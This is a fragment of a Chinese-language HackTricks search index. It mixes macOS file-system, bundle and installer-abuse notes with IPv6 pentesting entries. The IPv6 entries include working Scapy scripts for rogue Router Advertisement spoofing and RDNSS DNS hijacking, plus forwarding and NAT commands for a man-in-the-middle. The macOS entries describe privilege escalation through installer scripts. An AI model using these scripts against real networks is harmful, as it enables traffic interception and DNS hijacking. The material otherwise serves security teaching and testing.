XML 或二进制格式存储信息。 可以是 XML 或二进制。二进制文件可以使用以下命令读取: defaults read config.plist /usr/libexec/PlistBuddy -c print config.plsit plutil -p ~/Library/Preferences/com.apple.screensaver.plist plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o - plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o - .app : Apple 应用程序,遵循目录结构(这是一个包)。 .dylib : 动态库(如 Windows DLL 文件) .pkg : 与 xar(可扩展归档格式)相同。安装命令可用于安装这些文件的内容。 .DS_Store : 此文件位于每个目录中,保存目录的属性和自定义设置。 .Spotlight-V100 : 此文件夹出现在系统中每个卷的根目录上。 .metadata_never_index : 如果此文件位于卷的根目录,Spotlight 将不会索引该卷。 .noindex : 具有此扩展名的文件和文件夹将不会被 Spotlight 索引。 .sdef : 包内的文件,指定如何通过 AppleScript 与应用程序进行交互。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » OS X 特定扩展","id":"2223","title":"OS X 特定扩展"},"2224":{"body":"包是一个 目录 ,在 Finder 中 看起来像一个对象 (包的示例是 *.app 文件)。 macOS Bundles","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS 包","id":"2224","title":"macOS 包"},"2225":{"body":"在 macOS(和 iOS)中,所有系统共享库,如框架和 dylibs, 合并为一个单一文件 ,称为 dyld 共享缓存 。这提高了性能,因为代码可以更快地加载。 在 macOS 中,这位于 /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/,在旧版本中,您可能会在 /System/Library/dyld/ 中找到 共享缓存 。 在 iOS 中,您可以在 /System/Library/Caches/com.apple.dyld/ 中找到它们。 与 dyld 共享缓存类似,内核和内核扩展也被编译到内核缓存中,在启动时加载。 为了从单一文件 dylib 共享缓存中提取库,可以使用二进制文件 dyld_shared_cache_util ,虽然现在可能无法使用,但您也可以使用 dyldextractor : bash # dyld_shared_cache_util\\ndyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e # dyldextractor\\ndyldex -l [dyld_shared_cache_path] # List libraries\\ndyldex_all [dyld_shared_cache_path] # Extract all\\n# More options inside the readme tip 请注意,即使 dyld_shared_cache_util 工具无法工作,您也可以将 共享的 dyld 二进制文件传递给 Hopper ,Hopper 将能够识别所有库并让您 选择要调查的库 : 一些提取器可能无法工作,因为 dylibs 是与硬编码地址预链接的,因此它们可能会跳转到未知地址。 tip 还可以通过在 Xcode 中使用模拟器下载其他 *OS 设备的共享库缓存。它们将下载到:ls $HOME/Library/Developer/Xcode/<*>OS\\\\ 
DeviceSupport//Symbols/System/Library/Caches/com.apple.dyld/,例如:$HOME/Library/Developer/Xcode/iOS\\\\ DeviceSupport/14.1\\\\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Dyld 共享库缓存 (SLC)","id":"2225","title":"Dyld 共享库缓存 (SLC)"},"2226":{"body":"dyld 使用系统调用 shared_region_check_np 来知道 SLC 是否已被映射(返回地址),并使用 shared_region_map_and_slide_np 来映射 SLC。 请注意,即使 SLC 在第一次使用时被滑动,所有 进程 也使用 相同的副本 ,这 消除了 ASLR 保护,如果攻击者能够在系统中运行进程。这在过去实际上被利用过,并通过共享区域分页器修复。 分支池是小的 Mach-O dylibs,它在映像映射之间创建小空间,使得无法插入函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 映射 SLC","id":"2226","title":"映射 SLC"},"2227":{"body":"使用环境变量: DYLD_DHARED_REGION=private DYLD_SHARED_CACHE_DIR= DYLD_SHARED_CACHE_DONT_VALIDATE=1 -> 这将允许加载新的共享库缓存 DYLD_SHARED_CACHE_DIR=avoid 并手动用指向共享缓存的符号链接替换库与真实库(您需要提取它们)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 覆盖 SLCs","id":"2227","title":"覆盖 SLCs"},"2228":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 特殊文件权限","id":"2228","title":"特殊文件权限"},"2229":{"body":"在一个 文件夹 中, 读取 允许 列出它 , 写入 允许 删除 和 写入 文件, 执行 允许 遍历 目录。因此,例如,具有 文件的读取权限 的用户在一个他 没有执行 权限的目录中 将无法读取 该文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件夹权限","id":"2229","title":"文件夹权限"},"223":{"body":"因为每个 IPv6 主机 自动加入多个组播组 (ff02::1, ff02::2, …) 并使用 ICMPv6 进行 SLAAC/NDP,你可以在不发送任何数据包的情况下映射整个段。以下 Python/Scapy 单行代码监听最有趣的 L2 消息,并打印出带有颜色和时间戳的日志,显示谁是谁: python #!/usr/bin/env python3\\nfrom scapy.all import *\\nfrom scapy.layers.dhcp6 import *\\nfrom datetime import datetime\\nfrom colorama import Fore, Style, init\\nimport argparse init(autoreset=True) # Human-readable names for protocols we care about\\nDHCP6_TYPES = {\\nDHCP6_Solicit: \'Solicit\',\\nDHCP6_Advertise: \'Advertise\',\\nDHCP6_Request: 
\'Request\',\\nDHCP6_Reply: \'Reply\',\\nDHCP6_Renew: \'Renew\',\\nDHCP6_Rebind: \'Rebind\',\\nDHCP6_RelayForward:\'Relay-Forward\',\\nDHCP6_RelayReply: \'Relay-Reply\'\\n}\\nICMP6_TYPES = {\\nICMPv6ND_RS: (\'Router Solicitation\', Fore.CYAN),\\nICMPv6ND_RA: (\'Router Advertisement\', Fore.GREEN),\\nICMPv6ND_NS: (\'Neighbor Solicitation\',Fore.BLUE),\\nICMPv6ND_NA: (\'Neighbor Advertisement\',Fore.MAGENTA),\\nICMPv6ND_Redirect:(\'Redirect\', Fore.LIGHTRED_EX),\\nICMPv6MLReport: (\'MLD Report\', Fore.LIGHTCYAN_EX),\\nICMPv6MLReport2: (\'MLD Report\', Fore.LIGHTCYAN_EX),\\nICMPv6MLDone: (\'MLD Done\', Fore.LIGHTCYAN_EX),\\nICMPv6EchoRequest:(\'Echo Request\', Fore.LIGHTBLACK_EX),\\nICMPv6EchoReply: (\'Echo Reply\', Fore.LIGHTBLACK_EX)\\n} def handler(pkt):\\neth_src = pkt[Ether].src if Ether in pkt else \'?\'\\neth_dst = pkt[Ether].dst if Ether in pkt else \'?\'\\nip6_src = pkt[IPv6].src if IPv6 in pkt else \'?\'\\nip6_dst = pkt[IPv6].dst if IPv6 in pkt else \'?\' # Identify protocol family first\\nfor proto,(desc,color) in ICMP6_TYPES.items():\\nif proto in pkt:\\nbreak\\nelse:\\nif UDP in pkt and pkt[UDP].dport == 547: # DHCPv6 server port\\nfor dhcp_t,name in DHCP6_TYPES.items():\\nif dhcp_t in pkt:\\ndesc = \'DHCPv6 – \'+name; color = Fore.YELLOW; break\\nelse:\\nreturn # not a DHCPv6 message we track\\nelse:\\nreturn # not interesting print(color + f\\"[{datetime.now().strftime(\'%H:%M:%S\')}] {desc}\\")\\nprint(f\\" MAC {eth_src} -> {eth_dst}\\")\\nprint(f\\" IPv6 {ip6_src} -> {ip6_dst}\\")\\nprint(\'-\'*60) if __name__ == \'__main__\':\\nargp = argparse.ArgumentParser(description=\'IPv6 NDP & DHCPv6 sniffer\')\\nargp.add_argument(\'-i\',\'--interface\',required=True,help=\'Interface to sniff\')\\nargp.add_argument(\'-t\',\'--time\',type=int,default=0,help=\'Duration (0 = infinite)\')\\na = argp.parse_args()\\nsniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0) 结果:在几秒钟内生成一个完整的 link-local topology (MAC ⇄ IPv6),而不会触发依赖于主动扫描的 IPS/IDS 
系统。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 被动 NDP 和 DHCPv6 嗅探","id":"223","title":"被动 NDP 和 DHCPv6 嗅探"},"2230":{"body":"在文件中可以设置一些标志,这将使文件表现得不同。您可以使用 ls -lO /path/directory 检查文件的标志 。 uchg :被称为 uchange 标志将 防止任何操作 更改或删除 文件 。要设置它,请执行:chflags uchg file.txt 根用户可以 删除标志 并修改文件 restricted :此标志使文件 受到 SIP 保护 (您无法将此标志添加到文件)。 Sticky bit :如果目录具有粘滞位, 只有 该 目录的所有者或根用户可以重命名或删除 文件。通常,这在 /tmp 目录上设置,以防止普通用户删除或移动其他用户的文件。 所有标志可以在文件 sys/stat.h 中找到(使用 mdfind stat.h | grep stat.h 查找)并且是: UF_SETTABLE 0x0000ffff: 可更改的所有者标志的掩码。 UF_NODUMP 0x00000001: 不转储文件。 UF_IMMUTABLE 0x00000002: 文件不可更改。 UF_APPEND 0x00000004: 对文件的写入只能追加。 UF_OPAQUE 0x00000008: 目录在联合方面是透明的。 UF_COMPRESSED 0x00000020: 文件被压缩(某些文件系统)。 UF_TRACKED 0x00000040: 对于设置了此标志的文件,不会有删除/重命名的通知。 UF_DATAVAULT 0x00000080: 读取和写入需要权限。 UF_HIDDEN 0x00008000: 提示该项不应在 GUI 中显示。 SF_SUPPORTED 0x009f0000: 超级用户支持标志的掩码。 SF_SETTABLE 0x3fff0000: 超级用户可更改标志的掩码。 SF_SYNTHETIC 0xc0000000: 系统只读合成标志的掩码。 SF_ARCHIVED 0x00010000: 文件已归档。 SF_IMMUTABLE 0x00020000: 文件不可更改。 SF_APPEND 0x00040000: 对文件的写入只能追加。 SF_RESTRICTED 0x00080000: 写入需要权限。 SF_NOUNLINK 0x00100000: 项目不可被移除、重命名或挂载。 SF_FIRMLINK 0x00800000: 文件是一个 firmlink。 SF_DATALESS 0x40000000: 文件是无数据对象。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 标志修饰符","id":"2230","title":"标志修饰符"},"2231":{"body":"文件 ACLs 包含 ACE (访问控制条目),可以为不同用户分配更 细粒度的权限 。 可以授予 目录 这些权限:list、search、add_file、add_subdirectory、delete_child、delete_child。 而对于 文件 :read、write、append、execute。 当文件包含 ACLs 时,您将在列出权限时 看到一个 \\"+\\" ,例如: bash ls -ld Movies\\ndrwx------+ 7 username staff 224 15 Apr 19:42 Movies 您可以使用以下命令 读取文件的ACL : bash ls -lde Movies\\ndrwx------+ 7 username staff 224 15 Apr 19:42 Movies\\n0: group:everyone deny delete 您可以使用(这非常慢)找到 所有带有 ACL 的文件 : bash ls -RAle / 2>/dev/null | grep -E -B1 \\"\\\\d: \\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件 ACLs","id":"2231","title":"文件 ACLs"},"2232":{"body":"扩展属性具有名称和任何所需的值,可以使用 ls -@ 查看,并使用 
xattr 命令进行操作。一些常见的扩展属性包括: com.apple.resourceFork: 资源分叉兼容性。也可显示为 filename/..namedfork/rsrc com.apple.quarantine: MacOS: Gatekeeper 隔离机制 (III/6) metadata:*: MacOS: 各种元数据,例如 _backup_excludeItem 或 kMD* com.apple.lastuseddate (#PS): 最后文件使用日期 com.apple.FinderInfo: MacOS: Finder 信息(例如,颜色标签) com.apple.TextEncoding: 指定 ASCII 文本文件的文本编码 com.apple.logd.metadata: logd 在 /var/db/diagnostics 中使用的文件 com.apple.genstore.*: 代际存储(文件系统根目录中的 /.DocumentRevisions-V100) com.apple.rootless: MacOS: 由系统完整性保护用于标记文件 (III/10) com.apple.uuidb.boot-uuid: logd 对具有唯一 UUID 的启动时期的标记 com.apple.decmpfs: MacOS: 透明文件压缩 (II/7) com.apple.cprotect: *OS: 每个文件的加密数据 (III/11) com.apple.installd.*: *OS: installd 使用的元数据,例如 installType,uniqueInstallID","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 扩展属性","id":"2232","title":"扩展属性"},"2233":{"body":"这是一种在 MacOS 机器中获取 备用数据流 的方法。您可以通过将内容保存在名为 com.apple.ResourceFork 的扩展属性中,将其保存在 file/..namedfork/rsrc 中。 bash echo \\"Hello\\" > a.txt\\necho \\"Hello Mac ADS\\" > a.txt/..namedfork/rsrc xattr -l a.txt #Read extended attributes\\ncom.apple.ResourceFork: Hello Mac ADS ls -l a.txt #The file length is still q\\n-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt 您可以 找到所有包含此扩展属性的文件 : bash find / -type f -exec ls -ld {} \\\\; 2>/dev/null | grep -E \\"[x\\\\-]@ \\" | awk \'{printf $9; printf \\"\\\\n\\"}\' | xargs -I {} xattr -lv {} | grep \\"com.apple.ResourceFork\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 资源分叉 | macOS ADS","id":"2233","title":"资源分叉 | macOS ADS"},"2234":{"body":"扩展属性 com.apple.decmpfs 表示文件是加密存储的,ls -l 将报告 大小为 0 ,压缩数据存储在此属性中。每当访问该文件时,它将在内存中解密。 可以使用 ls -lO 查看此属性,标记为压缩,因为压缩文件也带有标志 UF_COMPRESSED。如果通过 chflags nocompressed 删除压缩文件的此标志,系统将不知道该文件是压缩的,因此无法解压并访问数据(它会认为文件实际上是空的)。 工具 afscexpand 可用于强制解压文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » decmpfs","id":"2234","title":"decmpfs"},"2235":{"body":"Mac OS 
二进制文件通常被编译为 universal binaries 。一个 universal binary 可以 在同一文件中支持多种架构 。 macOS Universal binaries & Mach-O Format","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Universal binaries & Mach-o Format","id":"2235","title":"Universal binaries & Mach-o Format"},"2236":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Process Memory","id":"2236","title":"macOS Process Memory"},"2237":{"body":"macOS Memory Dumping","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS memory dumping","id":"2237","title":"macOS memory dumping"},"2238":{"body":"目录 /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System 存储有关 不同文件扩展名相关风险的信息 。该目录将文件分类为不同的风险级别,影响 Safari 下载这些文件时的处理方式。类别如下: LSRiskCategorySafe :此类别中的文件被认为是 完全安全的 。Safari 会在下载后自动打开这些文件。 LSRiskCategoryNeutral :这些文件没有警告,Safari 不会自动打开 。 LSRiskCategoryUnsafeExecutable :此类别下的文件 触发警告 ,指示该文件是一个应用程序。这是一个安全措施,用于提醒用户。 LSRiskCategoryMayContainUnsafeExecutable :此类别适用于可能包含可执行文件的文件,例如归档文件。除非 Safari 能验证所有内容是安全或中性的,否则将 触发警告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Risk Category Files Mac OS","id":"2238","title":"Risk Category Files Mac OS"},"2239":{"body":"$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 :包含有关下载文件的信息,例如下载来源的 URL。 /var/log/system.log :OSX 系统的主日志。com.apple.syslogd.plist 负责执行 syslogging(您可以通过在 launchctl list 中查找 \\"com.apple.syslogd\\" 来检查它是否被禁用)。 /private/var/log/asl/*.asl :这些是 Apple 系统日志,可能包含有趣的信息。 $HOME/Library/Preferences/com.apple.recentitems.plist :通过 \\"Finder\\" 存储最近访问的文件和应用程序。 $HOME/Library/Preferences/com.apple.loginitems.plsit :存储系统启动时要启动的项目。 $HOME/Library/Logs/DiskUtility.log :DiskUtility 应用程序的日志文件(有关驱动器的信息,包括 USB)。 /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist :有关无线接入点的数据。 /private/var/db/launchd.db/com.apple.launchd/overrides.plist 
:已停用的守护进程列表。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Log files","id":"2239","title":"Log files"},"224":{"body":"IPv6 主机依赖 ICMPv6 Router Advertisements 进行默认网关发现。如果你注入伪造的 RAs 比合法路由器更频繁 ,设备将默默地切换到你作为网关。 python #!/usr/bin/env python3\\nfrom scapy.all import *\\nimport argparse p = argparse.ArgumentParser()\\np.add_argument(\'-i\',\'--interface\',required=True)\\np.add_argument(\'-m\',\'--mac\',required=True,help=\'Source MAC (will be put in SrcLL option)\')\\np.add_argument(\'--llip\',required=True,help=\'Link-local source IP, e.g. fe80::dead:beef\')\\np.add_argument(\'-l\',\'--lifetime\',type=int,default=1800,help=\'Router lifetime\')\\np.add_argument(\'--interval\',type=int,default=5,help=\'Seconds between RAs\')\\np.add_argument(\'--revert\',action=\'store_true\',help=\'Send lifetime=0 to undo attack\')\\nargs = p.parse_args() lifetime = 0 if args.revert else args.lifetime\\nra = (IPv6(src=args.llip,dst=\'ff02::1\',hlim=255)/\\nICMPv6ND_RA(routerlifetime=lifetime, prf=0x1)/ # High preference\\nICMPv6NDOptSrcLLAddr(lladdr=args.mac)) send(ra,iface=args.interface,loop=1,inter=args.interval) 要在赢得比赛后实际 转发流量 : bash sudo sysctl -w net.ipv6.conf.all.forwarding=1\\nsudo ip6tables -A FORWARD -i eth0 -j ACCEPT\\nsudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 路由器广告标志 (M/O) 和默认路由器优先级 (Prf) 标志 意义 对客户端行为的影响 M (管理地址配置) 当设置为 1 时,主机必须使用 DHCPv6 来获取其 IPv6 地址。 整个地址来自 DHCPv6 – 非常适合 mitm6 风格的中间人攻击。 O (其他配置) 当设置为 1 时,主机应仅使用 DHCPv6 来获取 其他 信息(DNS, NTP, …)。 地址仍通过 SLAAC 获取,但 DNS 可以通过 DHCPv6 被劫持。 M=0 / O=0 纯 SLAAC 网络。 仅可能使用 RA / RDNSS 技巧 – 客户端不会发送 DHCPv6。 M=1 / O=1 混合环境。 同时使用 DHCPv6 
和 SLAAC;欺骗的表面最大。 在渗透测试期间,您可以简单地检查一次合法的 RA 并决定哪个向量是可行的: bash sudo tcpdump -vvv -i eth0 \'icmp6 && ip6[40] == 134\' # capture Router Advertisements 查找转储中的 flags [M,O] 字段 - 无需猜测。 Prf (路由器优先级)字段在 RA 头部控制当存在 多个 网关时你的恶意路由器看起来有多吸引人: Prf 值 二进制 意义 高 10 客户端更喜欢这个路由器而不是任何 中 / 低 的路由器 中(默认) 01 几乎所有合法设备都使用 低 00 仅在没有更好的路由器时选择 使用 Scapy 生成数据包时,可以通过 prf 参数设置,如上所示(prf=0x1 → 高)。结合 高 Prf 、 短间隔 和 非零生命周期 使你的恶意网关异常稳定。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 路由器广告 (RA) 欺骗","id":"224","title":"路由器广告 (RA) 欺骗"},"2240":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » macOS Bundles","id":"2240","title":"macOS Bundles"},"2241":{"body":"macOS 中的 Bundles 作为各种资源的容器,包括应用程序、库和其他必要文件,使它们在 Finder 中看起来像单一对象,例如熟悉的 *.app 文件。最常见的 bundle 是 .app bundle,尽管 .framework、.systemextension 和 .kext 等其他类型也很普遍。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » 基本信息","id":"2241","title":"基本信息"},"2242":{"body":"在 bundle 内,特别是在 .app/Contents/ 目录中,存放着各种重要资源: _CodeSignature : 此目录存储代码签名详细信息,对于验证应用程序的完整性至关重要。您可以使用以下命令检查代码签名信息: %%%bash openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 %%% MacOS : 包含在用户交互时运行的应用程序的可执行二进制文件。 Resources : 应用程序用户界面组件的存储库,包括图像、文档和界面描述(nib/xib 文件)。 Info.plist : 作为应用程序的主要配置文件,对于系统正确识别和与应用程序交互至关重要。 Info.plist 中的重要键 Info.plist 文件是应用程序配置的基石,包含以下键: CFBundleExecutable : 指定位于 Contents/MacOS 目录中的主可执行文件的名称。 CFBundleIdentifier : 提供应用程序的全局标识符,macOS 在应用程序管理中广泛使用。 LSMinimumSystemVersion : 指示运行该应用程序所需的最低 macOS 版本。","breadcrumbs":"macOS Security & 
Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » Bundle 的基本组成部分","id":"2242","title":"Bundle 的基本组成部分"},"2243":{"body":"要探索 bundle 的内容,例如 Safari.app,可以使用以下命令: bash ls -lR /Applications/Safari.app/Contents 此探索揭示了如 _CodeSignature、MacOS、Resources 等目录,以及如 Info.plist 的文件,每个文件都在保护应用程序、定义其用户界面和操作参数方面发挥独特作用。 其他 Bundle 目录 除了常见目录,bundles 还可能包括: Frameworks : 包含应用程序使用的捆绑框架。框架类似于 dylibs,但具有额外资源。 PlugIns : 用于增强应用程序功能的插件和扩展的目录。 XPCServices : 存放应用程序用于进程间通信的 XPC 服务。 这种结构确保所有必要组件都封装在 bundle 内,促进模块化和安全的应用程序环境。 有关 Info.plist 键及其含义的更多详细信息,Apple 开发者文档提供了广泛的资源: Apple Info.plist Key Reference 。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » 探索 Bundles","id":"2243","title":"探索 Bundles"},"2244":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » macOS 安装程序滥用","id":"2244","title":"macOS 安装程序滥用"},"2245":{"body":"macOS 安装包 (也称为 .pkg 文件)是一种由 macOS 用于 分发软件 的文件格式。这些文件就像一个 包含软件所需的一切的盒子 ,以便正确安装和运行。 包文件本身是一个存档,包含一个 将在目标计算机上安装的文件和目录的层次结构 。它还可以包括 脚本 ,在安装前后执行任务,例如设置配置文件或清理旧版本的软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » Pkg 基本信息","id":"2245","title":"Pkg 基本信息"},"2246":{"body":"Distribution (xml) : 自定义(标题,欢迎文本……)和脚本/安装检查 PackageInfo (xml) : 信息,安装要求,安装位置,运行脚本的路径 Bill of materials (bom) : 要安装、更新或删除的文件列表及文件权限 Payload (CPIO archive gzip compresses) : 从 PackageInfo 中在 install-location 安装的文件 Scripts (CPIO archive gzip compressed) : 安装前和安装后的脚本以及提取到临时目录以供执行的更多资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 层次结构","id":"2246","title":"层次结构"},"2247":{"body":"bash # Tool to directly get the files inside a package\\npkgutil —expand \\"/path/to/package.pkg\\" \\"/path/to/out/dir\\" # Get the files ina. 
more manual way\\nmkdir -p \\"/path/to/out/dir\\"\\ncd \\"/path/to/out/dir\\"\\nxar -xf \\"/path/to/package.pkg\\" # Decompress also the CPIO gzip compressed ones\\ncat Scripts | gzip -dc | cpio -i\\ncpio -i < Scripts 为了在不手动解压缩安装程序的情况下可视化其内容,您还可以使用免费的工具 Suspicious Package 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 解压缩","id":"2247","title":"解压缩"},"2248":{"body":"DMG 文件,或称 Apple 磁盘映像,是苹果的 macOS 用于磁盘映像的文件格式。DMG 文件本质上是一个 可挂载的磁盘映像 (它包含自己的文件系统),其中包含通常被压缩且有时被加密的原始块数据。当您打开 DMG 文件时,macOS 将其挂载为物理磁盘 ,允许您访问其内容。 caution 请注意, .dmg 安装程序支持 如此多的格式 ,以至于在过去,一些包含漏洞的格式被滥用以获得 内核代码执行 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » DMG 基本信息","id":"2248","title":"DMG 基本信息"},"2249":{"body":"DMG 文件的层级结构可能会根据内容而有所不同。然而,对于应用程序 DMG,它通常遵循以下结构: 顶层:这是磁盘映像的根。它通常包含应用程序,并可能包含指向应用程序文件夹的链接。 应用程序 (.app):这就是实际的应用程序。在 macOS 中,应用程序通常是一个包含许多单独文件和文件夹的包,这些文件和文件夹构成了该应用程序。 应用程序链接:这是指向 macOS 中应用程序文件夹的快捷方式。这样做的目的是方便您安装应用程序。您可以将 .app 文件拖到此快捷方式上以安装该应用程序。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 层级结构","id":"2249","title":"层级结构"},"225":{"body":"RFC 8106 允许在 RA 中添加 递归 DNS 服务器(RDNSS) 选项。现代操作系统(Win 10 ≥1709、Win 11、macOS Big Sur、Linux systemd-resolved 等)会自动信任它: python #!/usr/bin/env python3\\nfrom scapy.all import *\\nimport argparse p = argparse.ArgumentParser()\\nP = p.add_argument\\nP(\'-i\',\'--interface\',required=True)\\nP(\'--llip\',required=True)\\nP(\'--dns\',required=True,help=\'Fake DNS IPv6\')\\nP(\'--lifetime\',type=int,default=600)\\nP(\'--interval\',type=int,default=5)\\nargs = p.parse_args() ra = (IPv6(src=args.llip,dst=\'ff02::1\',hlim=255)/\\nICMPv6ND_RA(routerlifetime=0)/\\nICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime)) send(ra,iface=args.interface,loop=1,inter=args.interval) 客户将 预先添加 
您的DNS到其解析器列表中,直到给定的生存时间结束,这将授予完全的DNS劫持,直到值过期或您发送lifetime=0还原。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 通过 RA 进行 RDNSS(DNS)欺骗","id":"225","title":"通过 RA 进行 RDNSS(DNS)欺骗"},"2250":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 通过 pkg 滥用进行特权提升","id":"2250","title":"通过 pkg 滥用进行特权提升"},"2251":{"body":"如果预安装或后安装脚本例如从 /var/tmp/Installerutil 执行,攻击者可以控制该脚本,从而在每次执行时提升特权。或者另一个类似的例子: https://www.youtube.com/watch?v=kCXhIYtODBg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 从公共目录执行","id":"2251","title":"从公共目录执行"},"2252":{"body":"这是一个 公共函数 ,多个安装程序和更新程序将调用它以 以 root 身份执行某些操作 。此函数接受要 执行 的 文件 的 路径 作为参数,然而,如果攻击者能够 修改 此文件,他将能够 滥用 其以 root 身份执行以 提升特权 。 bash # Breakpoint in the function to check wich file is loaded\\n(lldb) b AuthorizationExecuteWithPrivileges\\n# You could also check FS events to find this missconfig For more info check this talk: https://www.youtube.com/watch?v=lTOItyjTTkw","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » AuthorizationExecuteWithPrivileges","id":"2252","title":"AuthorizationExecuteWithPrivileges"},"2253":{"body":"如果安装程序写入 /tmp/fixedname/bla/bla,可以在 /tmp/fixedname 上 创建一个挂载 ,并且没有所有者,这样你就可以 在安装过程中修改任何文件 来滥用安装过程。 一个例子是 CVE-2021-26089 ,它成功地 覆盖了一个定期脚本 以获得 root 权限。有关更多信息,请查看这个演讲: OBTS v4.0: \\"Mount(ain) of Bugs\\" - Csaba Fitzl","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 执行通过挂载","id":"2253","title":"执行通过挂载"},"2254":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » pkg 作为恶意软件","id":"2254","title":"pkg 作为恶意软件"},"2255":{"body":"可以仅生成一个 .pkg 文件,里面包含 预安装和后安装脚本 ,而没有任何真正的载荷,除了脚本中的恶意软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, 
